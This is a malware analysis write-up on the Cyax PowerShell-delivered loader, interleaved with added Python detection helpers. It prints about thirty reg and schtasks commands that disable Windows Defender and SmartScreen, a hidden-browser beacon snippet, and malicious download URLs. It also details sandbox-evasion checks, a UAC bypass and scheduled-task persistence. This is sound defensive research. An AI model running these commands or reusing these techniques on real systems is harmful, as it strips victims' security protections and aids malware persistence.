Cyax Malware - Evasive Loader Reemerges

Towards the end of 2018, enSilo blocked a suspicious attack attempt originating from a generic PowerShell script. While investigating the attack, our team discovered an interesting loader malware that delivers different payloads. At the time of writing this post, commercial anti-virus (AV) products did not identify this script as hostile.


Figure 1: The undetected PowerShell script in VirusTotal

The script disables various defensive mechanisms built into the system and then downloads the next payload, which consists of an NSIS installer responsible for installing a local certificate, and another PowerShell script that drops an embedded PE which uses InstallUtil to run the main loader in memory.

Figure 2: Attack flow


The following sections describe each one of these steps in detail.


Technical Analysis


Initial Powershell Script


The attack begins with a malicious, obfuscated PowerShell script. The following are its static characteristics:
SHA-1: 6e6b81bf6a68d6e102d2de6e1d54e3cec5123909
First VT submission: 2018-11-09
File size: 19.23KB
File name: ddr.ps1

The obfuscation is fairly basic and relies on simple tricks to prevent AV products from detecting the script statically. For example, the following command takes the local environment variable $env:comspec and uses specific characters of it to build the expression IEX, which is the PowerShell alias for the Invoke-Expression command.


.( $enV:CoMsPEc[4,15,25]-Join'')
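As an added illustration (not code from the original post), the Python helper below resolves this indexed environment-variable trick back to the literal it evaluates to, so a reviewer or a signature engine can see the IEX call. It assumes the Windows default value of COMSPEC, which is constructed inline.

```python
import re

# Constructed environment for the demo (the Windows default for COMSPEC);
# on a real host, pass os.environ instead.
SAMPLE_ENV = {"COMSPEC": r"C:\WINDOWS\system32\cmd.exe"}

# Matches  $env:NAME[i,j,...] -Join 'sep'  as used by the script. The variable
# name, index list and -Join operator are case-insensitive in PowerShell, and
# whitespace around -Join is optional.
INDEXED_ENV = re.compile(
    r"\$env:(?P<name>[A-Za-z_][A-Za-z0-9_()]*)"
    r"\[(?P<idx>\s*-?\d+(?:\s*,\s*-?\d+)*\s*)\]"
    r"\s*-join\s*(?P<sep>'[^']*'|\"[^\"]*\")",
    re.IGNORECASE,
)

def pick_chars(value, indices):
    """Apply PowerShell array indexing to a string: negative indices count
    from the end and out-of-range indices contribute nothing ($null)."""
    return [value[i] for i in indices if -len(value) <= i < len(value)]

def deobfuscate(script, env):
    """Rewrite each indexed-env construct as the single-quoted literal it
    evaluates to, so the script can be read and matched by signatures."""
    env = {k.upper(): v for k, v in env.items()}
    def repl(m):
        value = env.get(m.group("name").upper())
        if value is None:           # unknown variable: leave the construct as-is
            return m.group(0)
        indices = [int(x) for x in m.group("idx").split(",")]
        sep = m.group("sep")[1:-1]  # strip the surrounding quotes
        return "'" + sep.join(pick_chars(value, indices)) + "'"
    return INDEXED_ENV.sub(repl, script)

def resolves_to_invoke_expression(script, env):
    """True when any quoted literal in the rewritten script is iex or
    invoke-expression, the tell-tale of this obfuscation style."""
    literals = re.findall(r"'([^']*)'", deobfuscate(script, env))
    return any(l.lower() in ("iex", "invoke-expression") for l in literals)

if __name__ == "__main__":
    line = ".( $enV:CoMsPEc[4,15,25]-Join'')"          # the command quoted above
    print(deobfuscate(line, SAMPLE_ENV))                 # .( 'Iex')
    print(resolves_to_invoke_expression(line, SAMPLE_ENV))  # True
```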

The script uses the reg.exe utility to disable the various built-in Microsoft defense mechanisms in the system, both by deleting specific registry keys and by adding new registry values that disable certain modules. It also uses the schtasks.exe utility to disable the scheduled tasks of different defensive modules. It is obvious that the malware author specifically aims to disable most, if not all, Windows Defender features, even during the boot stage of the system. Aside from Windows Defender, it also disables Exploit Guard, SmartScreen and Internet Explorer's phishing filter. Figure 3 shows some of these commands (the full list of commands is located in Appendix A):

Figure 3: reg and schtasks commands
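An added example, not from the original post or the enSilo product, of how a defender could flag this tampering sequence in process-creation telemetry: the rules below match the reg.exe and schtasks.exe command lines listed in Appendix A, and a parent process that issues several distinct ones is escalated. The Sysmon-style events are constructed for the demo; the last one is benign.

```python
import re

# Constructed Sysmon-style process creation events (not taken from the page).
# The command lines mirror Appendix A; the final "reg query" event is benign.
SAMPLE_EVENTS = [
    {"ParentProcessId": 4242, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f'},
    {"ParentProcessId": 4242, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f'},
    {"ParentProcessId": 4242, "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable'},
    {"ParentProcessId": 4242, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "00000000" /f'},
    {"ParentProcessId": 4242, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f'},
    {"ParentProcessId": 9001, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'},
]

# Each rule is (name, regex over the full command line). Case-insensitive,
# because the attacker controls the casing of keys and values.
RULES = [
    ("defender_policy_tamper",
     re.compile(r'^reg\s+(add|delete)\s+"HKLM\\Software\\Policies\\Microsoft\\Windows Defender', re.I)),
    ("defender_service_disabled",   # Start=4 means SERVICE_DISABLED
     re.compile(r'^reg\s+add\s+"HKLM\\System\\CurrentControlSet\\Services\\(WdBoot|WdFilter|WdNisDrv|WdNisSvc|WinDefend)"\s+/v\s+"?Start"?\s.*?/d\s+"?4"?', re.I)),
    ("defender_telemetry_disabled",
     re.compile(r'Autologger\\Defender(Api|Audit)Logger"\s+/v\s+"?Start"?\s.*?/d\s+"?0"?', re.I)),
    ("defender_task_disabled",
     re.compile(r'^schtasks\s+/Change\s+/TN\s+"Microsoft\\Windows\\(Windows Defender|ExploitGuard)\\.*"\s+/Disable', re.I)),
    ("smartscreen_or_phishing_filter_disabled",
     re.compile(r'(EnableSmartScreen"\s+/t\s+REG_DWORD\s+/d\s+"?0+"?|SmartScreenEnabled"\s+/d\s+"?Off"?|PhishingFilter"\s+/v\s+"EnabledV9".*?/d\s+"?0+"?)', re.I)),
]

def classify(command_line):
    """Return the names of every tampering rule the command line matches."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(events, threshold=3):
    """Return (hits, escalated): hits is a list of (event index, rule names);
    escalated lists parent PIDs that spawned `threshold` or more distinct
    tampering actions, which is the burst pattern this script produces."""
    hits, per_parent = [], {}
    for i, ev in enumerate(events):
        rules = classify(ev["CommandLine"])
        if rules:
            hits.append((i, rules))
            per_parent.setdefault(ev["ParentProcessId"], set()).update(rules)
    escalated = sorted(p for p, r in per_parent.items() if len(r) >= threshold)
    return hits, escalated

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS)[0]:
        print(idx, rules)
    print("escalated parents:", scan(SAMPLE_EVENTS)[1])
```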

The script then browses to hxxp://seedpeer.us/index.html using a hidden Internet Explorer instance that it spawned through COM:

$ie = new-object -com "InternetExplorer.Application";
$ie.visible = $false;
$ie.navigate("hxxp://seedpeer.us/index.html")

It seems as if the URL might function as a simple beacon. Thereafter, it goes on to download an NSIS installer using a regular WebClient request from the following website:

hxxp://tracker.awesomepush.online/5bc63d002c822c0001ff45fd

The domain appears to be malicious and serves as a malware repository. At the time of writing this post, and according to information available on VirusTotal, the website was online and was serving this installer along with other malicious executables that were not related to this specific attack.

The script also downloads an additional PowerShell script from the following website.

hxxps://paste.ee/r/9zGV5/0

This additional script carries the main malicious activity; both downloaded components are then executed as the next stage of the attack flow.

The NSIS Installer

The first component in the second stage of the attack is an NSIS installer that presents the following static characteristics:

SHA-1: c2a517893f3edbb87d2466d106b6f9a11ecd4d0e
First VT submission: 2018-11-09
File size: 113.24KB
File names: bcdx.exe, rpcms.exe, installer.exe
File version: 11.1247.0.0
Compilation timestamp: 2012-02-24

When executed, the installer presents a setup screen as shown in Figure 4.


Figure 4: Installation process

The installer creates batch scripts in %temp%/cert.bat and %temp%/convert.bat to install a certificate as a root CA on the affected system using the Microsoft certutil.exe utility, followed by a communication attempt to a URL that seems to be another beacon. To ensure it succeeds in reaching the web page, as can be seen in the GET request in Figure 5, it tries all of the following methods:

  • Powershell web requests
  • BITSAdmin
  • Certutil
Figure 5: HTTP communication made by the installer

The certificate installed on the affected systems as shown in the following figure is registered with Plumix S.a.r.l under the domain plumix.com.


Figure 6: Installed certificate

The domain named in the certificate is listed for sale, and there is no public information about the registered company name. Since there is no attempt to communicate over SSL after the certificate is installed, this functionality is most likely intended for use in other operations, such as C&C (command and control) communications or hijacking network traffic.

The Downloaded PowerShell Dropper

SHA-1: B49A33408ED13E9CA8328271A74E0E058D6A66FF
File size: 276.29KB

The second-stage PowerShell script contains a base64-encoded .NET executable that is dropped into the Temp directory and executed, as shown in the following figure:


Figure 7: The dropper PowerShell Script

The Loader Executable

The dropped .NET executable is obfuscated by the Cassandra Crypter and its goal is to run the loader in-memory using the InstallUtil.exe utility. The following are its static characteristics:


SHA-1: B0DBB716BD32530BA9A324C0F565FC6F92F07E03
Product name: Event Viewer utility
File version: 3.3.0.2
File name: yYsdCQtABm.exe
File size: 206.50KB
Net GUID: b3e38391-567b-456f-853f-44129c1bfa3a

The executable creates and executes a VBScript to set a scheduled task that runs InstallUtil on itself.


Figure 8: VBScript to execute the loader in memory using installUtil.exe

The executable also implements a class that inherits from the Installer class; InstallUtil.exe loads this class using reflection. The executable also contains the next-stage loader as a resource, which is loaded dynamically as shown in Figure 9. This is a known application-whitelisting bypass technique, and it also helps the malware hide from an untrained eye.


Figure 9: Inheriting Installer Class
Figure 10: Embedded executables illustration

The main functionality runs in the InstallUtil process. It starts out by editing the process ACEs (Access Control Entries) to remove permissions and prevent the process from being opened by other processes, as shown in the following figure:


Figure 11: Access Control Entries manipulation

In addition, it deletes the ZoneID (the Zone.Identifier alternate data stream) to hide the fact that it was downloaded from the web.

The loader contains a hard-coded configuration in the form of an array, suggesting that it is not meant to be specific to one payload sample. Most likely, it is meant to serve as part of a builder framework.

The first binary flags that are checked indicate whether anti-VM and anti-analysis tests should take place, in an effort to maximize the loader's evasion capabilities. It tries to avoid running in a virtualized environment and being analyzed by different analysis tools. Some of these tests are:

  • Use time measurements and sleep operations to detect any time latency in virtualized environments.
  • Check multiple registry keys in an effort to find any indicators of running VMware, VirtualBox or QEMU.
  • Use WMI to query the system characteristics and search for VM related strings.
  • Check if kernel32.dll contains the method wine_get_unix_file_name.
  • Check different environment characteristics that indicate running inside a sandbox.

Appendix B provides a full list of the registry keys and sandbox checks.

Once the environment is validated, the loader uses a known UAC bypass method to gain higher privileges. This fileless UAC bypass method uses the auto-elevated eventvwr.exe executable.


Figure 12: BypassUAC function

The loader then copies itself to the %windir%\debug\WIA directory or to the %APPDATA% directory (depending on the outcome of the UAC bypass attempt) and changes the copied file's attributes to make it hidden, so that it is less likely to be noticed. To ensure the infection is persistent, it drops an XML file and uses it to register a scheduled task for the copied executable, as shown in the following figure:


Figure 13: Scheduled task for persistence

Refer to Appendix C for the full XML’s content.
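An added example (not from the original post) that audits a Task Scheduler XML definition with the structure of Appendix C for the persistence pattern described here: a logon-triggered task whose action runs from %windir%\debug\WIA or %APPDATA%. The sample task XML, the environment values, the user name and the executable name are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed environment values so the example runs offline; on a live host
# use os.path.expandvars on the command path instead.
ENV = {"%windir%": r"C:\Windows", "%appdata%": r"C:\Users\victim\AppData\Roaming",
       "%temp%": r"C:\Users\victim\AppData\Local\Temp"}
# Locations the post associates with the loader: its two copy targets and the
# dropper's Temp directory. Matched as lowercase substrings of the expanded path.
ODD_DIRS = ("\\windows\\debug\\wia\\", "\\appdata\\", "\\temp\\")

def expand(path):
    """Expand %VAR% tokens using the constructed ENV map (case-insensitive)."""
    return re.sub(r"%[^%]+%", lambda m: ENV.get(m.group(0).lower(), m.group(0)), path)

def audit_task(xml_text):
    """Parse a Task Scheduler XML definition (decode UTF-16 files first) and
    return (command, findings) for the traits of the loader's persistence task."""
    root = ET.fromstring(xml_text)
    cmd = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS)
    full = expand(cmd).lower()
    findings = []
    if any(d in full for d in ODD_DIRS):
        findings.append("exec_from_loader_directory")
    if root.findtext("t:Triggers/t:LogonTrigger/t:Enabled", default="", namespaces=NS) == "true":
        findings.append("logon_trigger")
    if root.findtext("t:Settings/t:ExecutionTimeLimit", default="", namespaces=NS) == "PT0S":
        findings.append("unlimited_runtime")
    if root.findtext("t:Settings/t:MultipleInstancesPolicy", default="", namespaces=NS) == "StopExisting":
        findings.append("stop_existing_instances")
    return cmd, findings

# Constructed sample with the same shape as Appendix C; "victim" and
# "loader.exe" are placeholders, not values from the page.
SUSPECT_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>victim</Author></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled><UserId>victim</UserId></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>victim</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>%windir%\\debug\\WIA\\loader.exe</Command></Exec></Actions>
</Task>"""

# Constructed benign task for contrast: calendar-triggered vendor updater.
BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Settings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit></Settings>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Vendor\\Updater.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(audit_task(SUSPECT_TASK))
    print(audit_task(BENIGN_TASK))
```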

In addition to the anti-VM and anti-analysis settings, the built-in configuration array also contains the following:

  • A binary flag that indicates whether a download-and-execute function should be carried out, along with two strings that specify the remote URL to download the file from and the filename to save it as. Although we did not see this functionality active in any of the samples, it might be related to the certificate installed earlier by the NSIS installer.
  • Two parameters which indicate the Process Hollowing target and the payload.

Possible targets for Process Hollowing are the following:

  • The loader itself (the default option)
  • MSBuild.exe
  • RegAsm.exe
  • RegSvcs.exe
  • Jsc.exe

Figure 14: Process Hollowing target selection

Every sample is built to deliver a specific malware family, which is straightforward since the payload is embedded in the executable as a resource. So far, we have observed the following malware variants being bundled with this loader:

  • Azorult
  • FormBook
  • NetWire
  • NjRAT
  • Pony
  • Imminent Monitor RAT

enSilo Endpoint Security Platform
The enSilo endpoint security platform successfully detects and blocks this attack at any stage. The following figures illustrate how the enSilo platform blocks the initial phase of this attack from downloading the next-stage malware.

Figure 15: Blocking the original PowerShell script

Figure 16: Blocking the NSIS installer

Figure 17: Blocking the NSIS installer

Figure 18: Blocking the loader’s in-memory .NET module

Final Notes

While not presenting any sophisticated evasion techniques, the described loader seems to be recently active and delivering a wide variety of payloads.

A blog post from Kaspersky published in late 2017 described a loader that uses multiple similar techniques. We believe that this loader is a new version of the one described by Kaspersky. The new version, which we dubbed “Cyax”, has undergone extensive code changes and has a different delivery tactic using PowerShell.

Since Cyax starts by disabling Windows Defender and Exploit Guard, we can assume that it targets users with newer versions of Windows. Also, given the various customization options combined with the fact that we observed many different and unrelated payloads, we suspect Cyax is being offered as a service to cybercriminals. The installation of the certificate suggests a motivation for future developments and attack vectors.

IOCs


URLs and IPs

hxxp://seedpeer.us/index.html

hxxp://tracker.awesomepush.online/5bc63d002c822c0001ff45fd

hxxps://paste.ee/r/9zGV5/0

80.241.222.137

Appendix A - List of Reg and Schtask Commands

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t REG_DWORD /d "00000000" /f

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /d "Off" /f

reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "00000000" /f

Appendix B - Anti VM & Anti Analysis Checks

Registry keys:

  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (checks if the identifier contains VBOX or VMWARE or QEMU)
  • HARDWARE\Description\System (checks if the SystemBiosVersion contains VBOX or QEMU)
  • HARDWARE\Description\System (checks if the VideoBiosVersion contains VIRTUALBOX)
  • SOFTWARE\Oracle\VirtualBox Guest Additions (checks if exists)
  • SOFTWARE\VMware, Inc.\VMware Tools (checks if exists)
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (checks if the identifier contains VMWARE)
  • HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0 (checks if the identifier contains VMWARE)
  • SYSTEM\ControlSet001\Services\Disk\Enum (checks if contains vmware)
  • SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000 (checks if DriverDesc contains VMWARE)
  • SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\Settings (checks if the Device Description contains VMWARE)
  • SOFTWARE\VMware, Inc.\VMware Tools (checks if InstallPath contains C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\)

Device names information queried through WMI:

  • VM Additions S3 Trio32/64
  • S3 Trio32/64
  • VirtualBox Graphics Adapter
  • VMware SVGA II

Sandbox checks:

  • Checks if SbieDll.dll is loaded
  • Checks for the following strings in the executable’s path:
    • SANDBOX
    • USER
    • VIRUS
    • MALWARE
    • SCHMIDTI
    • CURRENTUSER
    • \VIRUS
    • SAMPLE
  • Checks if the path of the binary is “C:\file.exe”
  • Checks for an active window with a class name of Afx:400000:0 (checks whether MFC is present on the system)

Appendix C - XML content

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>[USERID]</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>[USERID]</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>[USERID]</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>[LOCATION]</Command>
    </Exec>
  </Actions>
</Task>
